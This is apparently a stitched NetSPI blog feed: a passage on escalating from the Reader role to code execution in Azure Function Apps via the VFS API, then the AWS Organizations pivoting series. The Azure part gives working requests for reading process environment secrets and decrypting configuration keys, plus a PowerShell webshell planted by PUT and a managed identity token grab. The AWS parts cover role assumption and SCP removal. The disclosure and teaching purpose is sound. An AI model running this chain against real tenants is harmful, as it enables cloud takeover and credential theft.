mtime  : 1970-01-01T00:00:00+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/lost%2Bfound%2F?relativePath=0&api-version=2021-01-15 
path   : /lost+found 

[Truncated] 

name   : proc 
size   : 0 
mtime  : 2022-09-14T22:28:57.5032138+00:00 
crtime : 2022-09-14T22:28:57.5032138+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc%2F?relativePath=0&api-version=2021-01-15 
path   : /proc 

[Truncated] 

name   : tmp 
size   : 0 
mtime  : 2022-09-14T22:56:33.6638983+00:00 
crtime : 2022-09-14T22:56:33.6638983+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/tmp%2F?relativePath=0&api-version=2021-01-15 
path   : /tmp 

name   : usr 
size   : 0 
mtime  : 2022-09-02T21:47:36+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/usr%2F?relativePath=0&api-version=2021-01-15 
path   : /usr 

name   : var 
size   : 0 
mtime  : 2022-09-03T21:23:43+00:00 
crtime : 2022-09-03T21:23:43+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/var%2F?relativePath=0&api-version=2021-01-15 
path   : /var 

Breaking out one of my favorite NetSPI blogs, Directory Traversal, File Inclusion, and The Proc File System, we know that we can potentially access environmental variables for different PIDs that are listed in the “proc” directory.  

Description of the function of the environ file in the proc file system.

If we request a listing of the proc directory, we can see that there are a handful of PIDs (denoted by the numbers) listed:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : fs 
size   : 0 
mtime  : 2022-09-21T22:00:39.3885209+00:00 
crtime : 2022-09-21T22:00:39.3885209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/fs/?relativePath=0&api-version=2021-01-15 
path   : /proc/fs 

name   : bus 
size   : 0 
mtime  : 2022-09-21T22:00:39.3895209+00:00 
crtime : 2022-09-21T22:00:39.3895209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/bus/?relativePath=0&api-version=2021-01-15 
path   : /proc/bus 

[Truncated] 

name   : 1 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1/?relativePath=0&api-version=2021-01-15 
path   : /proc/1 

name   : 16 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/16/?relativePath=0&api-version=2021-01-15 
path   : /proc/16 

[Truncated] 

name   : 59 
size   : 0 
mtime  : 2022-09-21T22:00:38.6785209+00:00 
crtime : 2022-09-21T22:00:38.6785209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/59/?relativePath=0&api-version=2021-01-15 
path   : /proc/59 

name   : 1113 
size   : 0 
mtime  : 2022-09-21T22:16:09.1248576+00:00 
crtime : 2022-09-21T22:16:09.1248576+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1113/?relativePath=0&api-version=2021-01-15 
path   : /proc/1113 

name   : 1188 
size   : 0 
mtime  : 2022-09-21T22:17:18.5695703+00:00 
crtime : 2022-09-21T22:17:18.5695703+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1188/?relativePath=0&api-version=2021-01-15 
path   : /proc/1188

For the next step, we can use PowerShell to request the “environ” file from PID 59 to get the environmental variables for that PID. We will then write it to a temp file and “get-content” the file to output it.

$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token 

Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/59/environ?relativePath=0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"} -OutFile .\TempFile.txt 

gc .\TempFile.txt 

PowerShell Output - Newlines added for clarity: 
CONTAINER_IMAGE_URL=mcr.microsoft.com/azure-functions/mesh:3.13.1-python3.7 
REGION_NAME=Central US  
HOSTNAME=SandboxHost-637993944271867487  
[Truncated] 
CONTAINER_ENCRYPTION_KEY=bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=  
LANG=C.UTF-8  
CONTAINER_NAME=E9911CE2-637993944227393451 
[Truncated]
CONTAINER_START_CONTEXT_SAS_URI=https://wawsstorageproddm1157.blob.core.windows.net/azcontainers/e9911ce2-637993944227393451?sv=2014-02-14&sr=b&sig=5ce7MUXsF4h%2Fr1%2BfwIbEJn6RMf2%2B06c2AwrNSrnmUCU%3D&st=2022-09-21T21%3A55%3A22Z&se=2023-09-21T22%3A00%3A22Z&sp=r
[Truncated]

In the output, we can see that there are a couple of interesting variables. 

  • CONTAINER_ENCRYPTION_KEY 
  • CONTAINER_START_CONTEXT_SAS_URI 

The encryption key variable is self-explanatory, and the SAS URI should be familiar to anyone that read Jake Karnes’ post on attacking Azure SAS tokens. If we navigate to the SAS token URL, we’re greeted with an “encryptedContext” JSON blob. Conveniently, we have the encryption key used for this data. 

A screenshot of an "encryptedContext" JSON blob with the encryption key.

Using CyberChef, we can quickly pull together the pieces to decrypt the data. In this case, the IV is the first portion of the JSON blob (“Bad/iquhIPbJJc4n8wcvMg==”). We know the key (“bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=”), so we will just use the middle portion of the Base64 JSON blob as our input.  

Here’s what the recipe looks like in CyberChef: 

An example of using CyberChef to decrypt data from a JSON blob.

Once decrypted, we have another JSON blob of data, now with only one encrypted chunk (“EncryptedEnvironment”). We won’t be dealing with that data as the important information has already been decrypted below. 

{"SiteId":98173790,"SiteName":"vfspoc2", 
"EncryptedEnvironment":"2 | Xj[REDACTED]== | XjAN7[REDACTED]KRz", 
"Environment":{"FUNCTIONS_EXTENSION_VERSION":"~3", 
"APPSETTING_FUNCTIONS_EXTENSION_VERSION":"~3", 
"FUNCTIONS_WORKER_RUNTIME":"python", 
"APPSETTING_FUNCTIONS_WORKER_RUNTIME":"python", 
"AzureWebJobsStorage":"DefaultEndpointsProtocol=https;AccountName=
storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;EndpointSuffix=
core.windows.net", 
"APPSETTING_AzureWebJobsStorage":"DefaultEndpointsProtocol=https;
AccountName=storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;
EndpointSuffix=core.windows.net", 
"ScmType":"None", 
"APPSETTING_ScmType":"None", 
"WEBSITE_SITE_NAME":"vfspoc2", 
"APPSETTING_WEBSITE_SITE_NAME":"vfspoc2", 
"WEBSITE_SLOT_NAME":"Production", 
"APPSETTING_WEBSITE_SLOT_NAME":"Production", 
"SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.blob.core.
windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-02-14&sr=b&
sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"APPSETTING_SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.
blob.core.windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-
02-14&sr=b&sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"WEBSITE_AUTH_ENCRYPTION_KEY":"F1[REDACTED]25", 
"AzureWebEncryptionKey":"F1[REDACTED]25", 
"WEBSITE_AUTH_SIGNING_KEY":"AF[REDACTED]DA", 
[Truncated] 
"FunctionAppScaleLimit":0,"CorsSpecializationPayload":{"Allowed
Origins":["https://functions.azure.com", 
"https://functions-staging.azure.com", 
"https://functions-next.azure.com"],"SupportCredentials":false},
"EasyAuthSpecializationPayload":{"SiteAuthEnabled":true,"SiteAuth
ClientId":"18[REDACTED]43", 
"SiteAuthAutoProvisioned":true,"SiteAuthSettingsV2Json":null}, 
"Secrets":{"Host":{"Master":"Q[REDACTED]=","Function":{"default":
"k[REDACTED]="}, 
"System":{}},"Function":[]}} 

The important things to highlight here are: 

  • AzureWebJobsStorage and APPSETTING_AzureWebJobsStorage 
  • SCM_RUN_FROM_PACKAGE and APPSETTING_SCM_RUN_FROM_PACKAGE 
  • Function App “Master” and “Default” secrets 

It should be noted that the “MICROSOFT_PROVIDER_AUTHENTICATION_SECRET” will also be available if the Function App has been set up to authenticate users via Azure AD. This is an App Registration credential that might be useful for gaining access to the tenant. 

While the jobs storage information is a nice way to get access to the Function App Storage Account, we will be more interested in the Function “Master” App Secret, as that can be used to overwrite the functions in the app. By overwriting the functions, we can get full command execution in the container. This would also allow us to gain access to any attached Managed Identities on the Function App. 

For our Proof of Concept, we’ll use the baseline PowerShell “hello” function as our template to overwrite: 

A screenshot of the PowerShell "hello" function.

This basic function just returns the “Name” submitted from a request parameter. For our purposes, we’ll convert this over to a Function App webshell (of sorts) that uses the “Name” parameter as the command to run.

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function 
processed a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. 
Pass a name in the query string or in the request body for a 
personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: 
",$cmdoutput)) 
} 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 

To overwrite the function, we will use BurpSuite to send a PUT request with our new code. Before we do that, we need to make an initial request for the function code to get the associated ETag to use with PUT request.

Initial GET of the Function Code:

GET /admin/vfs/home/site/wwwroot/HttpTrigger1/run.
ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 

HTTP/1.1 200 OK 
Content-Type: application/octet-stream 
Date: Wed, 21 Sep 2022 23:29:01 GMT 
Server: Kestrel 
ETag: "38aaebfb279cda08" 
Last-Modified: Wed, 21 Sep 2022 23:21:17 GMT 
Content-Length: 852 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 
[Truncated] 
}) 

PUT Overwrite Request Using the Tag as the “If-Match” Header:

PUT /admin/vfs/home/site/wwwroot/HttpTrigger1/
run.ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 
Content-Length: 851 
If-Match: "38aaebfb279cda08" 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function processed 
a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. 
Pass a name in the query string or in the request body for a 
personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: 
",$cmdoutput)) 
} 

# Associate values to output bindings by calling 
'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 


HTTP Response: 

HTTP/1.1 204 No Content 
Date: Wed, 21 Sep 2022 23:32:32 GMT 
Server: Kestrel 
ETag: "c243578e299cda08" 
Last-Modified: Wed, 21 Sep 2022 23:32:32 GMT

The server should respond with a 204 No Content, and an updated ETag for the file. With our newly updated function, we can start executing commands. 

Sample URL: 

https://vfspoc2.azurewebsites.net/api/HttpTrigger1?name=
whoami&code=Q[REDACTED]= 

Browser Output: 

Browser output for the command "whoami."

Now that we have full control over the Function App container, we can potentially make use of any attached Managed Identities and generate tokens for them. In our case, we will just add the following PowerShell code to the function to set the output to the management token we’re trying to export. 

$resourceURI = "https://management.azure.com" 
$tokenAuthURI = $env:IDENTITY_ENDPOINT + "?resource=
$resourceURI&api-version=2019-08-01" 
$tokenResponse = Invoke-RestMethod -Method Get 
-Headers @{"X-IDENTITY-HEADER"="$env:IDENTITY_HEADER"} 
-Uri $tokenAuthURI 
$body = $tokenResponse.access_token

Example Token Exported from the Browser: 

Example token exported from the browser.

For more information on taking over Azure Function Apps, check out this fantastic post by Bill Ben Haim and Zur Ulianitzky: 10 ways of gaining control over Azure function Apps.  

Conclusion 

Let’s recap the issue:  

  1. Start as a user with the Reader role on a Function App. 
  1. Abuse the undocumented VFS API to read arbitrary files from the containers.
  1. Access encryption keys on the Windows containers or access the “proc” files from the Linux Container.
  1. Using the Linux container, read the process environmental variables. 
  1. Use the variables to access configuration information in a SAS token URL. 
  1. Decrypt the configuration information with the variables. 
  1. Use the keys exposed in the configuration information to overwrite the function and gain command execution in the Linux Container. 

All this being said, we submitted this issue through MSRC, and they were able to remediate the file access issues. The APIs are still there, so you may be able to get access to some of the Function App container and application files with the appropriate role, but the APIs are now restricted for the Reader role. 

MSRC timeline

The initial disclosure for this issue, focusing on Windows containers, was sent to MSRC on Aug 2, 2022. A month later, we discovered the additional impact related to the Linux containers and submitted a secondary ticket, as the impact was significantly higher than initially discovered and the different base container might require a different remediation.  

There were a few false starts on the remediation date, but eventually the vulnerable API was restricted for the Reader role on January 17, 2023. On January 24, 2023, Microsoft rolled back the fix after it caused some issues for customers. 

On March 6, 2023, Microsoft reimplemented the fix to address the issue. The rollout was completed globally on March 8. At the time of publishing, the Reader role no longer has the ability to read files with the Function App VFS APIs. It should be noted that the Linux escalation path is still a viable option if an attacker has command execution on a Linux Function App. 

The post Escalating Privileges with Azure Function Apps appeared first on NetSPI.

]]>
Pivoting Clouds in AWS Organizations – Part 2: Examining AWS Security Features and Tools for Enumeration https://www.netspi.com/blog/technical/cloud-penetration-testing/pivoting-clouds-aws-organizations-part-2/ Tue, 07 Mar 2023 19:36:18 +0000 https://www.netspi.com/?p=29641 Explore AWS Organizations security implications and see a demonstration of a new Pacu module created for ease of enumeration. Key insights from AWS pentesting.

The post Pivoting Clouds in AWS Organizations – Part 2: Examining AWS Security Features and Tools for Enumeration appeared first on NetSPI.

]]>
As mentioned in part one of this two-part blog series on pentesting AWS Organizations, a singular mindset with regard to AWS account takeovers might result in missed opportunities for larger corporate environments. Specifically, those that leverage AWS Organizations for account management and centralization. Identifying and exploiting a single misconfiguration or credential leak in the context of AWS Organizations could result in a blast radius that encompasses several, if not all, of the remaining AWS company assets.   

To help mitigate this risk, I pulled from my experience in AWS penetration testing to provide an in-depth explanation of key techniques pentesting teams can use to identify weaknesses in AWS Organizations. 

Read part one to explore organizations, trusted access, and delegated administration and dive into various pivoting techniques after showing the initial “easy win” via created (as opposed to invited) member accounts. 

In this section, we will cover additional and newer AWS Organizations security implications and demonstrate a new Pacu module I created for ease of enumeration. 

Table of Contents

Phishing with AWS Account Management

AWS Account Management is an organization-integrated feature that offers a few simple APIs for updating or retrieving an AWS account’s contact information. This presents an interesting phishing vector.

Assuming we have compromised Account A, enable trusted access for Account Management via the CLI. Note Account Management supports delegated administration as well but we are focusing on trusted access for this portion.

Figure 1: Enable Trusted Access
Figure 1: Enable Trusted Access

With trusted access now enabled, update the contact information for Account B changing items like address or full name to assist in a future social engineering attack. Note: I have not attempted social engineering with AWS by calling the AWS help desk or other contacts, nor am I sanctioning that. This would be more from the perspective of trying to trick an engineer or another representative who manages an AWS account at the company to get access.

Figure 2: Update Member Account Contact Information
Figure 2: Update Member Account Contact Information
Get started identifying cloud misconfigurations and other security issues on your AWS infrastructure. Learn more about NetSPI's AWS Penetration Testing.

Delegated Policies – New Features, New Security Risks

AWS Organizations recently announced a new delegated administrator feature on November 27, 2022.  To summarize this release, AWS Organizations now gives you the ability to grant your delegated administrators more API privileges on top of the read-only access they previously gained by default. Only a subset of the Organization APIs dealing primarily with policy manipulation can be allow-listed for delegated administrators, and the allow-list implementation happens in the management account itself.  

In the image below, we used Account A to attach a Service Control Policy (SCP) to Account C that specifically denies S3 actions. A SCP can be thought of as an Identity and Access Management (IAM) policy filter. SCPs can be attached to accounts (like below) or organization accounts (OUs) and propagate downwards in terms of the overall organization hierarchy. They override any IAM privileges at the user/role level for their associated attached accounts. So even if users or roles in Account C have policies normally granting them S3 actions, they would still be blocked from calling S3 actions as the SCP at the organization-level takes precedence.  

Given this setup and the newly released feature, if a management account grants delegated administrators overly permissive rights in terms of policy access/manipulation, delegated administrators could remove restrictive SCPs from their own account or other accounts they control.

Figure 2: SCP Attached to Account C by Account A
Figure 2: SCP Attached to Account C by Account A

To enable the newer feature, navigate to the Settings tab in Account A and click “Delegate” in the “Delegated administrator for AWS Organizations” panel. In the delegation policy’s “Action” key, add organization APIs from the subset provided in the AWS user guide

Note that the actions added include the API calls for attaching and detaching any policy (AttachPolicy/DetachPolicy). Once the actions have been chosen, they are only granted to the member account if the delegation policy lists the member account number as a Principal (Account C in this scenario).

Figure 3: Allowing Policy Management by Delegated Administrators
Figure 3: Allowing Policy Management by Delegated Administrators
Figure 4: Create Policy To be Applied to Delegated Administrators
Figure 4: Create Policy To be Applied to Delegated Administrators

With this setup complete, we can switch to the attacker’s perspective. Assume that we have compromised credentials for Account C and already noted through reconnaissance that the compromised account is a delegated administrator. At this point in our assessment, we want to get access to S3 data but keep getting denied as seen below in Figure 4.

Figure 4: Try to list S3 Buckets as Account C
Figure 4: Try to list S3 Buckets as Account C

This makes sense as there is an SCP attached to Account C preventing S3 actions. But wait… with the new AWS Organization feature we as delegated admins might have additional privileges related to policy management that are not immediately evident. So, while still in Account C’s AWS Organization service, try to remove the SCP policy created by Account A from Account C.

Figure 5: View Attached Policies and Try to Detach as Account C
Figure 5: View Attached Policies and Try to Detach as Account C

Since the management account delegated us the rights to detach policy, the operation is successful, and we can now call S3 APIs as seen below in Figure 6. 

Figure 6: Observe Successful Detachment as Account C
Figure 6: Observe Successful Detachment as Account C
Figure 7: List S3 Buckets as Account C
Figure 7: List S3 Buckets as Account C

Rather than a trial-and-error method, you could also call the “describe-resource-policy” API as Account C and pull down the policy that exists in Account A. Remember that delegated administrators have read-only access by default so this should be possible unless otherwise restricted.

Figure 8: Retrieve Delegation Policy Defined in Account A as Account C
Figure 8: Retrieve Delegation Policy Defined in Account A as Account C

Enumeration Tool for AWS Organizations

A lot of what I covered is based off AWS Organization enumeration. If you compromise an AWS account, you will want to list all organization-related entities to understand the landscape for delegation and the general organization structure (assuming your account is even in an organization).  

To better assist in pentesting AWS Organizations, I added AWS Organizations support to the open-source AWS pentesting tool Pacu. I also wrote an additional Pacu enumeration module for AWS Organizations (organizations__enum). These changes were recently accepted into the Pacu GitHub project and are also available in the traditional pip3 installation procedure detailed in the repository’s README. The two relevant forks are located here:

Note that the GitHub Pacu project contains all APIs discussed thus far, but as you might note in the screenshots below, the pip installation just does not include 1 read-only API (describe-resource-policy) along with 1-2 bug fixes at this time.

I won’t cover how Pacu works as there is plenty of documentation for the tool, but I will run my module from the perspective of a management account and a normal (not a delegated administrator) member account.  

Let’s first run Pacu with respect to Account A. Note that the module collects many associated attributes ranging from a general organization description to delegation data. To see the collected data after running “organizations__enum,” you need to execute “data organizations.” My module also tries to build a visual graph at the end of the enumeration using the account.

Figure 9: Gather Organization Data from Account A
Figure 9: Gather Organization Data from Account A
Figure 10: Data Gathered from Account A
Figure 10: Data Gathered from Account A
Figure 11: View Organization Data & Graph from Account A
Figure 11: View Organization Data & Graph from Account A

At the other extreme, what if the account in question is a member account with no associated delegation? In this case, the module will still pick up the general description of the organization but will not dump all the organization data since your credentials do not have the necessary API permissions. At the very least, this would help tell you at a glance if the account in question is part of an organization. 

Figure 12: Gather Organization Data from Account B
Figure 12: Gather Organization Data from Account B
Figure 13: Data Gathered from Account B
Figure 13: Data Gathered from Account B

Defense

The content discussed above is not any novel zero-days or represents an inherent flaw in AWS itself. The root cause of most of these problems is exposed cleartext credentials and lack of least privilege. The cleartext credentials give an attacker access to the AWS account, with the trusted access and delegated administration allowing for easy pivoting.  

As mentioned in part one, consider a layered defense. Ensure that IAM users/roles adhere to a least privilege methodology, and that organization-integrated features are also monitored and not enabled if not needed. In all cases, protect AWS credentials to avoid access to the AWS environment allowing someone to enumerate the existing resources using a module like the Pacu one above, and subsequently exploit any pivoting vectors. To get a complete picture of the organization’s actions, ensure proper logging is in place as well. 

The following AWS articles provide guidance pertaining to the points discussed above. Or connect with NetSPI to learn how an AWS penetration test can help you uncover areas of misconfiguration or weakness in your AWS environment.  

Final Thoughts & Conclusion

The architecture and considerable number of enabled/delegated service possibilities in AWS Organizations presents a serious vector for lateral movement within corporate environments. This could easily turn a single AWS account takeover into a multiple account takeover that might cross accepted software deployment boundaries (i.e. pre-production & production). More importantly, a lot of examples given above assume you have compromised a single user or role that allowed for complete control over a given AWS account. In reality, you might find yourself in a situation where permissions are more granular so maybe one compromised user/role has the permissions to enable a service, while another user/role has the permissions to call the enabled service on the organization, and so on.  

We covered a lot in this two-part series on pivoting clouds in AWS Organizations. To summarize the key learnings and assist in your own replication, here’s a procedural checklist to follow: 

  1. Compromise a set of AWS credentials for a user or role in the compromised AWS Account. 
  2. Try to determine if you are the management account, a delegated administrator account, a default member account, or an account not part of an organization. If possible, try to run the Pacu “organizations__enum” module to gather all necessary details in one command.
  3. If you are the management account, go through each member account and try to assume the default role. Consider a wordlist with OrganizationAccountAccessRole included. You can also try to leverage any existing enabled services with IAM Identity Center being the desired service. If necessary, you can also check if there are any delegated administrators you have control over that might assist in pivoting. 
  4. If you are a delegated administrator, check for associated delegated services to exploit similar to enabled services or try to alter existing SCPs to grant yourself or other accounts more permissions. If necessary, you can also check if there are any other delegated administrators you have control over that might assist in pivoting. 

The post Pivoting Clouds in AWS Organizations – Part 2: Examining AWS Security Features and Tools for Enumeration appeared first on NetSPI.

]]>
Pivoting Clouds in AWS Organizations – Part 1: Leveraging Account Creation, Trusted Access, and Delegated Admin https://www.netspi.com/blog/technical/cloud-penetration-testing/pivoting-clouds-aws-organizations-part-1/ Mon, 06 Mar 2023 23:21:07 +0000 https://www.netspi.com/?p=29636 Explore several key points of AWS Organizations theory and learn exploitable opportunities in existing AWS solutions. Key insights from AWS pentesting.

The post Pivoting Clouds in AWS Organizations – Part 1: Leveraging Account Creation, Trusted Access, and Delegated Admin appeared first on NetSPI.

]]>
Amazon Web Services (AWS) is a cloud solution that is used by a large variety of consumers from the single developer to the large corporate hierarchies that make up much of our day-to-day lives. While AWS certainly offers many developer solutions, its roughly 33% cloud share, combined with its vertical customer spread, makes it an attractive target for hackers. This has resulted in numerous presentations/articles regarding privilege escalation within a single AWS account. 

While this is certainly instructional for smaller scale models or informal groupings of AWS accounts, a singular mindset with regard to AWS account takeovers might result in missed opportunities for larger corporate environments that specifically leverage AWS Organizations for account management and centralization. Identifying and exploiting a single misconfiguration or credential leak in the context of AWS Organizations could result in a blast radius that encompasses several, if not all, of the remaining AWS company assets.

This article uses an organization I built from my AWS penetration testing experience to both describe several key points of AWS Organizations theory and demonstrate exploitable opportunities in existing AWS solutions.

In part one of this two-part blog series, we’ll provide an “easy win” scenario and subsequently cover more involved pivoting opportunities with organization-integrated services. In part two, explore today’s AWS security features and tools for enumeration – including a Pacu module I built to assist in data collection.

Table of Contents

AWS Accounts as a Security Boundary

Figure 1: AWS Account Boundaries
Figure 1: AWS Account Boundaries

To differentiate one AWS account from another, AWS assigns each account a unique 12-digit value called an “AWS Account Number” (ex. 000000000001). For notation’s sake (and my own sanity), I will be swapping out 12-digit numbers with letters after initial account introductions below. These AWS accounts present a container or security boundary from an information security standpoint.

Entities created by a service for an individual developer’s AWS account would not be accessible to other AWS accounts. While both Account A and Account B have the S3 service, making a “bucket” in the S3 service in Account A means that bucket entity exists only in Account A, and not Account B.

Of course, you can configure resources to be shared cross-account, but for this generalization we are focusing on the existence and core ownership of the resource. Since AWS Organizations groups a lot of accounts together in one central service, it presents several opportunities to tunnel through these security boundaries and get the associated account’s resources/data.

AWS Organizations Vocabulary

Before we dive into organizations, let’s run through some quick vocabulary. AWS Organizations is an AWS service where customers can create “organizations.” An organization is composed of one or more individual AWS accounts. In Figure 2 below, Account A is the account that created the organization and, as such, is called the management account.

The management account has administrator-like privileges over the entire organization. It can invite other AWS accounts, remove AWS accounts, delete an organization, attach policies, and more. In Figure 2, Account A invited Account B and Account C to join its organization. Accounts B and C are still separate AWS accounts, but by accepting Account A’s invitation their references appear in Account A’s organization entity. Once the invite is accepted, Accounts B and C become member accounts and, by default, have significantly less privileges than the management account. 

A default member account can only view a few pieces of info associated with the management account. It cannot read other organization info, nor can it make changes in the organization. Default member accounts are so isolated that they do not have visibility into what other member accounts exist within the organization, only seeing themselves and the management account number. 

Organizational Units (OUs) can be thought of as customer-created “folders” that you can use for arranging account resources. Root is a special entity that appears in every AWS Organization and can be thought of as functionally equivalent to an OU under which all accounts exist.

A diagram of our sample organization is given in Figure 2. Account ***********0 (Account A) is the account in charge of managing the overall organization, Account ***********9 (Account B) is a member account holding pre-production data, and Account ***********6 (Account C) is a member account holding production data. Account B has a highlighted overly permissive role with a trust access policy set to *. For steps to set up an organization, refer to the AWS user guide.

Figure 2: AWS Organization Lab Layout
Figure 2: AWS Organization Lab Layout

Finally, note that navigating to AWS Organizations in a management account like Account A provides a different UI layout than AWS Organizations in a member account like Account C (Figure 3 versus Figure 4). Noticeably the lefthand navigation bar is different. Because member accounts have significantly less permissions with regard to the organization, navigating to “AWS Accounts” or “Policies” in a default member account returns permission errors as expected. These differences can aid testers in determining if they have access to a management or member account during AWS pentesting.

Figure 3: AWS Management Account Organizations UI
Figure 3: AWS Management Account Organizations UI
Figures 4: AWS Member Accounts Organizations UI
Figure 4: AWS Member Accounts Organizations UI
Figures 4: AWS Member Accounts Organizations UI

Easy Win with Account Creation

In Figure 2, along with most of this 2-part series, we will assume the member accounts in the organization were all pre-existing accounts that were added through individual invites. However, we will take a quick detour from this assumption to look at the AWS account creation feature as this can return an easy early win. This is shown in Figure 5.

Figure 5: AWS Account Creation Pivot
Figure 5: AWS Account Creation Pivot

Account A can choose to create an AWS account when adding it to the organization (as opposed to inviting a pre-existing AWS account like Accounts B and C). When this is done, AWS creates a specific role with a default name of OrganizationAccount AccessRole in the newly created member account. We will denote this newly created member account as Account D.

Figure 6: Account Creation Workflow
Figure 6: Account Creation Workflow

If we were to view the newly created OrganizationAccountAccessRole role in Account D, we would see that the role has AdministratorAccess attached to it and trusts the management account, Account A.

Figure 7: Account D’s OrganizationAccountAccessRole Trust Policy
Figure 7: Account D’s OrganizationAccountAccessRole Trust Policy

Thus, if we compromise credentials for a user/role with the necessary privileges in Account A, we could go through each member account in the AWS Organization and try to assume this default role name. A successful attempt will return credentials as seen below (Figure 8) allowing one to pivot from, in this case, Account A to Account D essentially as an administrator.

Figure 8: Using Account A to AssumeRole OrganizationAccountAccessRole in Account D
Figure 8: Using Account A to AssumeRole OrganizationAccountAccessRole in Account D

Again, this is the “easy win” scenario where you can go from relative control in a management account to administrator control in a member account. However, this might not be as feasible if a default role is not present in member accounts, or you are lacking permissions, or the member account was invited instead of created. In these cases, trusted access and delegated administration would be the next two features to consider.

Trusted Access and Delegated Administration Review

A handful of AWS services have set up specific features or API subsets that integrate with AWS Organizations (ex. IAM Access Analyzer) allowing their functionality to expand from a single AWS account to the entire organization. These organization-integrated features are in what we might consider an “off” state by default.

Figure 9: Trusted Access & Delegated Administration Visualized
Figure 9: Trusted Access & Delegated Administration Visualized

Per AWS, trusted access is when you “enable a compatible AWS service to perform operations across all of the AWS accounts in your organization.” In other words, you can think of trusted access as the “on” switch for these feature integrations. You “trust” the specific integrated feature thereby giving it “trusted access” to the organization data and associated accounts. The exact mechanism by which the feature operations are then carried out might involve service-linked roles created in each relevant account, but we will not examine this too closely for the purpose of this article. Just know trusted access generally grants the feature access to the entire organization.

Figure 9 demonstrates an expected trusted access workflow. Account A “enables” trusted access for one of the predefined organization-supported features which can then access the necessary management/member account resources. From this point onwards, the ability to influence/access/change the associated member accounts is feature specific with Access Analyzer, for example, choosing to access and scan each member account in the organization for trust violations. Enabling a feature like IAM Access Analyzer from the management account means it is an enabled service.

Delegated administration is a status applied to member accounts and gives the targeted member account “read-only access to AWS Organizations service data.” This would allow a member to perform actions like listing AWS organization accounts which was previously blocked per the UI errors in Figure 4. Additionally, the management account is “delegating” permissions to the member account with regards to a specific organization-integrated feature, such that the member account now has the permissions to run the specific feature within their own account on the entire organization. 

Delegated administration is illustrated by the blue lines in the diagram above (Figure 9). Account A would make Account C a delegated administrator specifically for IAM Access Analyzer, and Account C could now run IAM Access analyzer on the entire organization. Making a member account a delegated administrator for certain services like IAM Access Analyzer means Access Analyzer is a delegated service in Account C.

Trusted access and delegated administration are extremely feature-specific concepts and not every organization-integrated feature supports both trusted access and delegated administrators. Learn more about the services you can use with AWS Organizations here.

Leveraging IAM Access Analyzer through Trusted Access

Let’s assume we have compromised credentials for Account A. We could end this attack here but looking in AWS Organizations we would see the additional AWS Accounts B and C listed as member accounts. While we have no credentials or visibility into either member account, we can use our organization permissions from Account A to enable trusted access for a service (or use an already-enabled service). This will allow us to gather data on the member accounts. 

